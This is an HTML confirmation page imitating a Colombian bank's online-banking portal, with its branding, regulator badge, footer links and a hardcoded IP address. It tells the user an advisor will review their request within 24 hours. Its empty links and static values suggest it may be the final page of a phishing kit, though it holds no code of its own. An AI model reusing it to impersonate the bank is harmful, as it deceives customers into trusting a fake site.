<div class="success-page">
    <header class="bc-header">
        <div appheaderlogo="" logosizedesktop="225px" logosizemobile="24px">
            <section class="bc-header-brand">
                <div aria-label="Menú principal" role="button" class="bc-header-brand_menu-toggle bc-reverse-d-lg-none"
                    tabindex="0"><em role="img" class="bc-icon bc-sm em" style="visibility: visible;"
                        name="menu">menu</em><span>Menú</span></div><!----><!----><a class="bc-link">
                    <div class="div-desktop div" aria-hidden="true" style="width: 225px;"><img
                            src="/assets/img-horizontal-negative.svg"
                            alt="undefined" style="width: 225px;"></div>
                </a><!----><!---->
                <div class="bc-header-channel" tabindex="0">
                    <h5>Sucursal Virtual Personas</h5>
                </div><!---->
            </section>
        </div>
    </header>
    <div class="main-container">
        <div class="container">
            <div class="icon-container">
                <img src="assets/success.png" alt="">
            </div>
            <h1>Listo!</h1>
            <h4>Un asesor revisara tu solicitud en las proximas 24 horas.</h4>
        </div>
    </div>
    <footer _ngcontent-ng-c2515275900="">
        <div componentid="svp-footer">
            <div class="bc-footer" id="svp-footer">
                <div class="bc-container">
                    <div class="bc-footer-top-links">
                        <div class="bc-footer-top-links-ca">
                            <a bc-link=""
                                href=""
                                target="_blank" rel="noopener noreferrer" class="bc-link link-default"> ¿Problemas para
                                conectarte?
                            </a>
                        </div>
                        <div class="bc-footer-top-links-ca">
                            <a bc-link=""
                                href=""
                                target="_blank" rel="noopener noreferrer" class="bc-link link-default"> Aprende sobre
                                seguridad
                            </a>
                        </div>
                        <div class="bc-footer-top-links-ca">
                            <a bc-link=""
                                href=""
                                target="_blank" rel="noopener noreferrer" class="bc-link link-default"> Reglamento
                                Sucursal Virtual
                            </a>
                        </div>
                        <div class="bc-footer-top-links-ca">
                            <a bc-link=""
                                href=""
                                target="_blank" rel="noopener noreferrer" class="bc-link link-default"> Política de
                                privacidad
                            </a>
                        </div>
                    </div>
                    <div class="bc-footer-divisor"></div>
                    <div class="bc-footer-bottom">
                        <div class="bc-footer-bottom-left">
                            <div class="bc-footer-bottom-left-side">
                                <div class="bc-footer-bottom-top-icon">
                                    <div size="150px" alt="logo" aria-hidden="true" class="bc-logo"
                                        style="width: 150px;">
                                        <img src="/assets/img-horizontal-no-spacing.svg"
                                            alt="logo" style="width: 150px;">
                                    </div>
                                </div>
                                <div class="bc-footer-bottom-left-side-vigilant">
                                    <div alt="Vigilado Superintendencia Financiera de Colombia" aria-hidden="false"
                                        class="bc-logo" style="width: 16px;">
                                        <img src="/assets/logo-vigilado.svg"
                                            alt="Vigilado Superintendencia Financiera de Colombia" style="width: 16px;">
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="bc-footer-bottom-right">
                            <div class="bc-footer-bottom-right-text">
                                <p>Dirección IP: 191.25.42.1</p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </footer>
</div>